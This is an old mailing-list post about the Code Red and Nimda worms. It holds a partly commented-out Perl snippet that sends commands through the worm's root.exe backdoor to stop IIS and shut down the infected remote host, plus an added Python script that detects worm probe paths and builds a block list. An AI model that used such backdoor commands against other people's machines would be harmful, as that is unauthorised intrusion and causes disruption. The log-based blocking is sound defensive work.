[LUG] Code Red...
Samartha Deva
blug-receive at mtbwr.net
Thu Sep 27 23:35:56 MDT 2001
I am not so sure about the code.
If the "iisreset+/stop" line shuts down or stops the server,
how can the next request with "SHExitWindowsEx" get
honored by the server?
I have no means of testing it but I put the "SHExitWindowsEx"
line on top so when the shutdown works, it's off anyway.
The Code Red is coming up less and less, but the next one, Nim-something
(originally Code Rainbow), is worse. I am blocking about 1400 IPs and most of them start
with 63....., so the worm stays pretty much within the same segment.
Samartha
## my $iis_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop");
my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
## print "probulating... <br>";
## my $resp = $ua->request ($iis_stop_req);
## if ($resp->is_success) {
## print "Appears we have shut down IIS...<br>";
## my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
## my $server_stop_req = new HTTP::Request (GET =>
"http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5");
## $resp = $ua->request ($iis_stop_req);
##
## if ($resp->is_success) {
## print "Appears that we have also shutdown whatever OS
too...<br>";
## }
##
## # ok this will do magic email stuff when I get a chance to write it.
##
##
## } else {
## print "<h2>Boy! Are you yankin' my chain?!?</h2>";
## }
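
An added example, not part of the original message: one way to build the kind of block list mentioned above from a web server access log, and to check how many of the probing addresses share a first octet. It assumes Apache common log format; the log lines and addresses are constructed for illustration.

```python
import re
from collections import Counter

# Paths the worms probe for: /default.ida (Code Red) and the root.exe /
# cmd.exe command shells (root.exe is the path used in the script above).
PROBE = re.compile(r"/default\.ida|/(?:root|cmd)\.exe", re.IGNORECASE)

# Common log format: client address first, request line in quotes.
LINE = re.compile(
    r'^(\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[[^\]]*\] "(?:GET|HEAD|POST) (\S+)'
)

# Constructed sample log lines; every address here is made up.
SAMPLE_LOG = """
63.10.20.30 - - [27/Sep/2001:23:01:10 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
63.10.20.30 - - [27/Sep/2001:23:01:11 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
63.44.5.6 - - [27/Sep/2001:23:02:40 -0600] "GET /default.ida?NNNNNNNN HTTP/1.0" 404 270
63.200.1.9 - - [27/Sep/2001:23:03:02 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 280
198.51.100.7 - - [27/Sep/2001:23:04:15 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
192.0.2.10 - - [27/Sep/2001:23:05:00 -0600] "GET /index.html HTTP/1.0" 200 1043
"""

def probe_sources(log_text):
    """Return a Counter {client_ip: number_of_probe_requests}."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m and PROBE.search(m.group(2)):
            hits[m.group(1)] += 1
    return hits

def by_first_octet(hits):
    """Count distinct probing addresses per first octet (locality check)."""
    return Counter(ip.split(".")[0] for ip in hits)

def block_list(hits, min_probes=1):
    """Addresses with at least min_probes probe requests, in numeric order."""
    chosen = [ip for ip, n in hits.items() if n >= min_probes]
    return sorted(chosen, key=lambda ip: tuple(int(p) for p in ip.split(".")))

if __name__ == "__main__":
    hits = probe_sources(SAMPLE_LOG)
    for octet, count in by_first_octet(hits).most_common():
        print(f"{octet}.x.x.x: {count} probing address(es)")
    for ip in block_list(hits):
        print("block", ip)
```
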